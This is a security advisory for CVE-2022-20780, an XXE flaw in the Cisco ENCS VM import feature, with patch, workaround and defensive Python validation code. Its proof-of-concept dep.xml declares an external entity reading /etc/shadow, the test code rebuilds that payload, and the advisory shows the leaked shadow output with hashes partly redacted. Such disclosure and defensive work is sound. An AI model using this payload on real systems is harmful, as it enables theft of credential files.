Overview
ENCS can export VMs. When the vmExportAction command is requested, the VM's configuration and metadata are compressed together with the VM image into a .vmbkp archive.
The vmImportAction command is also available and imports .vmbkp archives.
This import is vulnerable to an XXE (XML External Entity) injection that allows system data to be leaked to the CLI and probably to the VM.
Details
The vmImportAction command expects a .vmbkp archive. This archive is a plain .tar.gz.
It must contain several files, one of them being dep.xml.
dep.xml is an XML configuration file describing the vm_lifecycle.
An attacker can add an external entity declaration to this XML file. The external entity is resolved by the EncsManager when the archive is imported.
Proof of Concept
In this example we inject the external entity into a variable field of a vm_group, so that it is resolved with the contents of the /etc/shadow file.
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]>
<vm_lifecycle xmlns="http://www.cisco.com/nfvis/vm_lifecycle">
  <tenants>
    <tenant>
      <name>admin</name>
      <deployments>
        <deployment>
          <name>ubuntu1</name>
          <vm_group>
            <name>ubuntu1</name>
            ...
            <config_data>
              ...
              <configuration>
                <dst>user-data</dst>
                ...
                <variable>
                  <name>xxe</name>
                  <val>&xxe;</val>
                </variable>
              </configuration>
            </config_data>
          </vm_group>
        </deployment>
      </deployments>
    </tenant>
  </tenants>
</vm_lifecycle>
As a result, the content of /etc/shadow is displayed in the imported configuration:
encs-audit-n# show running-config vm_lifecycle tenants tenant admin deployments deployment ubuntu1 vm_group ubuntu1 config_data configuration variable xxe
vm_lifecycle tenants tenant admin
deployments deployment ubuntu1
vm_group ubuntu1
config_data configuration user-data
variable xxe
val [ "root:$6$TqVe9rHRx8kkXfb$<REDACTED>:18820:0:99999:7:::\nbin:*:18527:0:99999:7:::\ndaemon:*:18527:0:99999:7:::\nadm:*:18527:0:99999:7:::\nlp:*:18527:0:99999:7:::\nsync:*:18527:0:99999:7:::\nshutdown:*:18527:0:99999:7:::\nhalt:*:18527:0:99999:7:::\nmail:*:18527:0:99999:7:::\noperator:*:18527:0:99999:7:::\ngames:*:18527:0:99999:7:::\nftp:*:18527:0:99999:7:::\nnobody:*:18527:0:99999:7:::\nnginx:!!:18820::::::\nsystemd-network:!!:18820::::::\ndbus:!!:18820::::::\npolkitd:!!:18820::::::\nunbound:!!:18820::::::\nrpc:!!:18820:0:99999:7:::\ntss:!!:18820::::::\nqemu:!!:18820::::::\nsaslauth:!!:18820::::::\nopenvswitch:!!:18820::::::\nsshd:!!:18820::::::\ngeoclue:!!:18820::::::\nntp:!!:18820::::::\nchrony:!!:18820::::::\nrpcuser:!!:18820::::::\nnfsnobody:!!:18820::::::\nconsole:!!:18820:0:99999:7:::\ngluster:!!:18820::::::\nradvd:!!:18820::::::\nldap:!!:18820::::::\ndockerroot:!!:18820::::::\ntomcat:!!:18820::::::\npostgres:!!:18820::::::\ntcpdump:!!:18820::::::\npostfix:!!:18820::::::\nbird:!!:18820::::::\nadmin:$6$W56YPo/BPFohgh97$<REDACTED>:18820:0:99999:7:::\n" ]
!
!
!
!
!
Solution
Security patch
Upgrade to Cisco Enterprise NFVIS v4.7.1
Workaround
We recommend disabling external entity resolution in the XML parser.
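One way to implement this workaround as a pre-import check, added here as an example that is not Cisco's or the advisory's code: it reads dep.xml out of a .vmbkp archive and refuses the import if the XML carries any DTD construct, before a full parser touches the document. The page does not state the EncsManager's implementation language; Python's standard-library expat is used here, and the .vmbkp archives and dep.xml samples are constructed in memory.

```python
import io
import tarfile
import xml.etree.ElementTree as ET
from xml.parsers import expat

NS = "http://www.cisco.com/nfvis/vm_lifecycle"

class UnsafeDepXml(ValueError):
    """Raised when dep.xml carries a DOCTYPE, an entity declaration or an external reference."""

def assert_no_dtd(xml_bytes: bytes) -> None:
    """Streaming expat pass that aborts on the first DTD construct. dep.xml never needs a DTD,
    and the DTD is where the PoC declares its SYSTEM entity, so the import is refused early."""
    def refuse(*args):
        raise UnsafeDepXml(f"DTD construct not allowed in dep.xml: {args[0]!r}")
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = refuse   # <!DOCTYPE foo [...]>
    parser.EntityDeclHandler = refuse         # <!ENTITY xxe SYSTEM "file:///...">
    parser.ExternalEntityRefHandler = refuse  # &xxe; reached in element content
    parser.Parse(xml_bytes, True)

def import_variables(vmbkp: bytes) -> dict:
    """Read dep.xml from a .vmbkp (tar.gz), run the DTD check, return {variable name: val}."""
    with tarfile.open(fileobj=io.BytesIO(vmbkp), mode="r:gz") as tar:
        dep = tar.extractfile("dep.xml").read()
    assert_no_dtd(dep)  # refuse before ET (or any other parser) sees the document
    root, ns = ET.fromstring(dep), {"vl": NS}
    return {v.findtext("vl:name", namespaces=ns): v.findtext("vl:val", namespaces=ns)
            for v in root.iterfind(".//vl:variable", ns)}

# Constructed sample archives, not real ENCS exports: a tar.gz holding only dep.xml.
def make_vmbkp(dep: bytes) -> bytes:
    buf, info = io.BytesIO(), tarfile.TarInfo("dep.xml")
    info.size = len(dep)
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        tar.addfile(info, io.BytesIO(dep))
    return buf.getvalue()

def dep_xml(name: str, val: str, doctype: str = "") -> bytes:
    """Constructed dep.xml with the vm_lifecycle layout of the PoC and a single variable."""
    return (f'<?xml version="1.0" encoding="UTF-8" standalone="no"?>\n{doctype}<vm_lifecycle xmlns="{NS}">'
            f'<tenants><tenant><name>admin</name><deployments><deployment><name>ubuntu1</name>'
            f'<vm_group><name>ubuntu1</name><config_data><configuration><dst>user-data</dst>'
            f'<variable><name>{name}</name><val>{val}</val></variable></configuration>'
            f'</config_data></vm_group></deployment></deployments></tenant></tenants></vm_lifecycle>').encode()

BENIGN = make_vmbkp(dep_xml("hostname", "vm01"))
XXE = make_vmbkp(dep_xml("xxe", "&xxe;", '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]>\n'))
```

The benign archive imports normally, while the archive carrying the PoC's DOCTYPE is rejected by the DOCTYPE handler before the entity declaration or the `&xxe;` reference is ever processed.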
References
https://nvd.nist.gov/vuln/detail/CVE-2022-20780
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-NFVIS-MUL-7DySRX9
Credits
Orange CERT-CC
Cyrille CHATRAS at Orange group
Loic RESTOUX at Orange group
Pierre DENOUEL at Orange group
Timeline
Date reported: September 16, 2021
Date fixed: May 4, 2022